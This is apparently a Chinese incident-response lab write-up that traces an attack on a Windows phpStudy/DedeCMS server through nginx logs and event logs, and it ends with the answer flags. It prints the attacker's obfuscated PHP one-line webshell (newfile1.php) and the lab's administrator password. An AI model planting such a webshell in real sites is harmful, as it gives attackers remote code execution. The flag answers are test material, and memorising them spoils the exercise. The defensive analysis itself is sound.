服务器场景操作系统 Windows
服务器账号密码 administrator P@ssw0rd
题目来源公众号 ©州弟学安全
任务环境说明
这是某单位正常运行的主机,但由于安全防范意识不到位,导致系统被攻击。目前已知攻击者成功接管了系统。
需要通过上机排查,利用开放的服务快速识别攻击者的操作、最终攻击成功的方法以及接管成功的IP。相关工具和全程流量数据已放置在桌面中。
1. 你需要根据环境内的所有工具和文件,附件等,根据应急响应形式快速排查出攻击者的所有行为
2. 你需要排查出攻击者最后利用成功的漏洞以及利用成功IP进行整理
3. 你需要自己按照攻击者思路写一份攻击者大概的攻击思路或攻击流程图
4. 你可以借助一切工具,你可以把它当作实战,这里没有任何约束条件
注:样本请勿在本地运行!!!样本请勿在本地运行!!!样本请勿在本地运行!!!
应急响应工程师小王某人收到安全设备告警服务器被植入恶意文件,请上机排查开放题目
漏洞修复
前瞻:
分析端口-计时任务
检查开放端口-netstat -nao
通过netstat命令,发现 3389 端口(远程桌面)和 80/8080 端口(WEB 服务)开放。
这些端口的开放可能意味着系统可能被远程访问或有 WEB 服务在运行。
根据端口号查看服务-tasklist /fi "PID eq 628"
tasklist|findstr 628
使用cmder工具可以在windows中使用linux中的命令如:cat、awk等等
分析得知,系统使用phpstudy搭建了两个web服务端口分别为80、8080,其中80为静态网站、8080为dedecms网站。服务中间件是nginx,查看nginx日志文件,先查看了一下error.log,发现除了127.0.0.1还有192.168.18.133具有大量访问失败的记录并且访问的网站端口基本都是8080。
使用 awk "{print $1}" access.log | sort | uniq -c 可以统计访问者中源ip地址与其个数
查看access.log文件发现主要记录是127.0.0.1和192.168.18.133,所以几乎可以确定攻击者为:192.168.18.133
使用awk "$9!=404 {print $1,$6,$7,$9}" access.log ,在最后发现一个可疑的命令访问了phpinfo();但是没有成功,恶意文件名应该就是为newfile1.php
awk "$9!=404 {print $1,$6,$7,$9}" access.log | grep POST 过滤POST相关的记录分析得应该是通过弱口令成功登录网站,让后通过网站后台写入木马。
在网站目录下搜索newfile得到了木马文件
<? @("Y;HJ(Z"^"8H;/Z.")(${"~?}$"^"!x8p"}[1]);
使用FullEventLogView工具对系统的事件进行查看发现攻击者的爆破行为与接管的主机192.168.18.1
、
“使用者”字段指明本地系统上请求登录的帐户。这通常是一个服务(例如 Server 服务)或本地进程(例如 Winlogon.exe 或 Services.exe)。
“登录类型”字段指明发生的登录的种类。最常见的类型是 2 (交互式)和 3 (网络)。
“进程信息”字段表明系统上的哪个帐户和进程请求了登录。
“网络信息”字段指明远程登录请求来自哪里。“工作站名”并非总是可用,而且在某些情况下可能会留为空白。
“身份验证信息”字段提供关于此特定登录请求的详细信息。
-“传递服务”指明哪些直接服务参与了此登录请求。
-“数据包名”指明在 NTLM 协议之间使用了哪些子协议。
-“密钥长度”指明生成的会话密钥的长度。如果没有请求会话密钥,则此字段为 0。
1. 请找出攻击者攻击成功的端口,如多个端口,则从小到大{x,x,x,}
flag{21,3389,8080}
2. 请找出攻击者上传的恶意文件名
flag{newfile1.php}
3. 请找出攻击者最终攻击成功的端口
flag{3389}
4. 请找出攻击者最终攻击成功端口的IP
flag{192.168.18.133}
5. 请找出攻击者最后接管服务器的IP
flag{192.168.18.1}
扫一扫
3812
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
